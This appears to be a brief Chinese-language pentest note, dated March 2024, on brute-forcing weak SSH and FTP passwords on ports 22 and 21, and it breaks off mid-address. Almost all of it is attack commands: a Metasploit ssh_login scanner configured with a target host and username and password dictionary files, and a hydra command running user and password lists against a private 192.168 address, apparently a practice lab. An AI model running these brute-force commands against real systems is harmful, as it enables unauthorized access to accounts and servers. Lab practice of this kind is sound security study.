2024年3月18日22/21端口 弱口令爆破(MSF,hydra) use auxiliary/scanner/ssh/ssh_login set RHOSTS 192.168.41.136 set USER_FILE /root/Desktop/tools/dic_username_ssh.txt set PASS_FILE /root/Desktop/tools/pwd100.txt hydra -L /home/kali/Desktop/sshfuzz/user.txt -P /home/kali/Desktop/sshfuzz/pass.txt 192.168...